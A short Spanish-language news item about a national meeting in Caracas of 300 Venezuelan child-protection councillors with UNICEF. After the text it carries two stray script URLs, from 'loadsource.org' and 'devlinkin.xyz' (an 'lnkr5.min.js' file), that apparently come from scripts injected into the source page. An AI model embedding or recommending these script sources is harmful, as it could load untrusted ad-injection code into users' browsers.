En el evento se hizo especial énfasis en los Consejos de Protección, al valorarlos por su compromiso de proteger los derechos de la niñez en sus comunidades.

300 consejeros de la protección de la niñez de Venezuela asistieron este viernes al Encuentro Nacional de Consejeros y Consejeras de Protección de Niños, Niñas y Adolescentes XV.

El evento fue celebrado en la ciudad de Caracas, en el marco del Plan de Trabajo entre la Asociación Nacional de Consejeros y Consejeras de Protección (Asonacop) y Unicef.

La agenda de dos días incluyó mesas de trabajo y plenarias sobre la migración internacional y la autorización y registro de adolescentes trabajadores.

“Reiteramos la disposición de UNICEF de continuar apoyando en el fortalecimiento de las capacidades de los integrantes del Sistema Rector Nacional para la Protección Integral de los Niños, Niñas y Adolescentes”, indicó Rafael Ramírez Mesec, representante de Unicef en Venezuela.

También hizo especial énfasis en los Consejos de Protección, al valorarlos por su compromiso de proteger los derechos de la niñez en sus comunidades.

VÍA EL NACIONAL.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1532733856019https://devlinkin.xyz/addons/lnkr5.min.js

Loading...